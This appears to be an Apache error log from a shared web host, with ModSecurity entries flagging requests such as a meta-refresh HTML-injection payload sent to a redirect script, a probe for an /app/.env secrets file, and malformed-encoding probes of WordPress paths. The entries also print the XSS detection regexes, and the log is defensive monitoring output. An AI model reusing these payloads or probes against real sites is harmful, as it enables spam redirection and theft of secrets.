[Mon May 11 22:58:40.530167 2026] [security2:error] [pid 1601130:tid 1601160] [client 194.233.64.127:57160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJDAHEgAO_835W6c1mg8wAAAEo"]
[Mon May 11 22:58:40.530422 2026] [security2:error] [pid 1601130:tid 1601160] [client 194.233.64.127:57160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJDAHEgAO_835W6c1mg8wAAAEo"]
[Mon May 11 22:58:41.155480 2026] [security2:error] [pid 1605480:tid 1605542] [client 194.233.64.127:57190] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https:/%evolv.elupc@haedongacademy.org/phpinfo.php?a[]=<a href=https://oke.zone/viewtopic.php?id=535408>www.7d.org.ua</a><meta http-equiv=refresh content=0;url=https://oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJDAR2Cvzd_nyNfUm8J5QAAARQ"]
[Mon May 11 22:58:41.157988 2026] [security2:error] [pid 1605480:tid 1605542] [client 194.233.64.127:57190] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>Www.7D.Org.Ua</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 /> found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>Www.7D.Org.Ua</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJDAR2Cvzd_nyNfUm8J5QAAARQ"]
[Mon May 11 22:58:41.162661 2026] [security2:error] [pid 1605480:tid 1605542] [client 194.233.64.127:57190] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 /> found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>Www.7D.Org.Ua</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSenso [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJDAR2Cvzd_nyNfUm8J5QAAARQ"]
[Mon May 11 22:58:41.163070 2026] [security2:error] [pid 1605480:tid 1605542] [client 194.233.64.127:57190] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>Www.7D.Org.Ua</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJDAR2Cvzd_nyNfUm8J5QAAARQ"]
[Mon May 11 22:58:41.167713 2026] [security2:error] [pid 1605480:tid 1605542] [client 194.233.64.127:57190] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>Www.7D.Org.Ua</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJDAR2Cvzd_nyNfUm8J5QAAARQ"]
[Mon May 11 22:58:41.168104 2026] [security2:error] [pid 1605480:tid 1605542] [client 194.233.64.127:57190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJDAR2Cvzd_nyNfUm8J5QAAARQ"]
[Mon May 11 22:58:41.175453 2026] [security2:error] [pid 1605480:tid 1605542] [client 194.233.64.127:57190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJDAR2Cvzd_nyNfUm8J5QAAARQ"]
[Mon May 11 22:58:52.405795 2026] [security2:error] [pid 1588898:tid 1590048] [client 43.167.157.80:51932] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "mail.piregwan-genesis.com"] [uri "/"] [unique_id "agJDDKFW67LJTsgN3jQWWwAAAAE"], referer: http://mail.piregwan-genesis.com
[Mon May 11 23:00:10.579490 2026] [security2:error] [pid 1605480:tid 1605532] [client 43.153.7.191:42546] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.ixinabourgoin.fr"] [uri "/"] [unique_id "agJDWh2Cvzd_nyNfUm8KQgAAAQo"]
[Mon May 11 23:00:19.030336 2026] [security2:error] [pid 1588898:tid 1588906] [client 43.134.92.251:54804] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJDY6FW67LJTsgN3jQW5AAAAAc"]
[Mon May 11 23:00:42.894639 2026] [:error] [pid 1601130:tid 1601158] [client 216.244.66.232:50984] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:00:44.626846 2026] [ssl:error] [pid 1606352:tid 1606420] (EAI 2)Name or service not known: [client 116.202.235.23:46398] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:00:44.628046 2026] [ssl:error] [pid 1606352:tid 1606420] AH01941: stapling_renew_response: responder error
[Mon May 11 23:00:44.680407 2026] [ssl:error] [pid 1588898:tid 1588919] (EAI 2)Name or service not known: [client 116.202.235.23:46410] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:00:44.680464 2026] [ssl:error] [pid 1588898:tid 1588919] AH01941: stapling_renew_response: responder error
[Mon May 11 23:00:44.734489 2026] [ssl:error] [pid 1601130:tid 1601173] (EAI 2)Name or service not known: [client 116.202.235.23:46426] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:00:44.734522 2026] [ssl:error] [pid 1601130:tid 1601173] AH01941: stapling_renew_response: responder error
[Mon May 11 23:00:44.784300 2026] [ssl:error] [pid 1590352:tid 1590414] (EAI 2)Name or service not known: [client 116.202.235.23:46432] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:00:44.784330 2026] [ssl:error] [pid 1590352:tid 1590414] AH01941: stapling_renew_response: responder error
[Mon May 11 23:00:51.367336 2026] [security2:error] [pid 1601130:tid 1601155] [client 43.133.61.171:36936] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/wp-json/"] [unique_id "agJDg3EgAO_835W6c1mhgQAAAEU"]
[Mon May 11 23:01:18.690735 2026] [security2:error] [pid 1630927:tid 1630939] [client 176.65.139.237:49290] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "manhattan-studio.fr"] [uri "/app/.env"] [unique_id "agJDnmiGYYhUwDaJINmYQgAAAUk"]
[Mon May 11 23:01:18.690958 2026] [security2:error] [pid 1630927:tid 1630939] [client 176.65.139.237:49290] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "manhattan-studio.fr"] [uri "/app/.env"] [unique_id "agJDnmiGYYhUwDaJINmYQgAAAUk"]
[Mon May 11 23:01:18.691214 2026] [security2:error] [pid 1630927:tid 1630939] [client 176.65.139.237:49290] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "manhattan-studio.fr"] [uri "/app/.env"] [unique_id "agJDnmiGYYhUwDaJINmYQgAAAUk"]
[Mon May 11 23:01:35.210946 2026] [security2:error] [pid 1590352:tid 1590403] [client 170.106.180.139:41848] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecorporatefinance.com"] [uri "/"] [unique_id "agJDr61q0G_aXAqWauQGHgAAAIs"]
[Mon May 11 23:01:36.782914 2026] [security2:error] [pid 1601130:tid 1601161] [client 43.156.18.240:54392] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.apoe.fr"] [uri "/downloads/Bulletin adhesion APOE 2018.pdf"] [unique_id "agJDsHEgAO_835W6c1mhuQAAAEs"]
[Mon May 11 23:02:23.633050 2026] [autoindex:error] [pid 1630927:tid 1630935] [client 47.251.92.53:53698] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:02:29.139573 2026] [autoindex:error] [pid 1588898:tid 1588919] [client 47.251.92.53:53708] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:02:41.378577 2026] [:error] [pid 1590352:tid 1590410] [client 46.151.178.13:50716] File does not exist: /home/totalcloud/public_html/index.php, referer: http://217.113.192.26:443/
[Mon May 11 23:03:07.227995 2026] [security2:error] [pid 1590352:tid 1590402] [client 79.137.64.41:41388] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/languages/\\"%1$s/\\""] [unique_id "agJEC61q0G_aXAqWauQGhwAAAIo"]
[Mon May 11 23:03:09.031065 2026] [autoindex:error] [pid 1590352:tid 1590395] [client 123.160.223.74:10410] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:03:13.901780 2026] [security2:error] [pid 1590352:tid 1590400] [client 79.137.64.41:47862] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/languages/\\"%2$s/\\""] [unique_id "agJEEa1q0G_aXAqWauQGkwAAAIg"]
[Mon May 11 23:03:15.319514 2026] [security2:error] [pid 1590352:tid 1590400] [client 79.137.64.41:47862] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/languages/\\"%3$s/\\""] [unique_id "agJEE61q0G_aXAqWauQGlQAAAIg"]
[Mon May 11 23:03:16.904778 2026] [security2:error] [pid 1590352:tid 1590400] [client 79.137.64.41:47862] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/languages/plugins/\\"%1$s/\\""] [unique_id "agJEFK1q0G_aXAqWauQGlwAAAIg"]
[Mon May 11 23:03:18.413556 2026] [security2:error] [pid 1590352:tid 1590400] [client 79.137.64.41:47862] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/languages/plugins/\\"%2$s/\\""] [unique_id "agJEFq1q0G_aXAqWauQGmQAAAIg"]
[Mon May 11 23:03:19.878464 2026] [security2:error] [pid 1590352:tid 1590400] [client 79.137.64.41:47862] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/languages/plugins/\\"%3$s/\\""] [unique_id "agJEF61q0G_aXAqWauQGmwAAAIg"]
[Mon May 11 23:03:28.994656 2026] [autoindex:error] [pid 1630927:tid 1630944] [client 123.160.223.72:47577] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:03:29.890960 2026] [security2:error] [pid 1588898:tid 1590048] [client 49.51.38.193:37046] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "missmandarine.com"] [uri "/"] [unique_id "agJEIaFW67LJTsgN3jQX3AAAAAE"], referer: http://missmandarine.com
[Mon May 11 23:03:31.222398 2026] [autoindex:error] [pid 1606352:tid 1606433] [client 123.160.223.74:12943] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:03:32.598730 2026] [security2:error] [pid 1588898:tid 1588910] [client 129.226.193.122:48018] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/nos-realisations"] [unique_id "agJEJKFW67LJTsgN3jQX4AAAAAs"]
[Mon May 11 23:03:39.898829 2026] [security2:error] [pid 1601130:tid 1601166] [client 129.226.193.122:59694] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/nos-realisations/"] [unique_id "agJEK3EgAO_835W6c1miTwAAAFA"], referer: https://letamsgarage.fr/nos-realisations#youngtimers
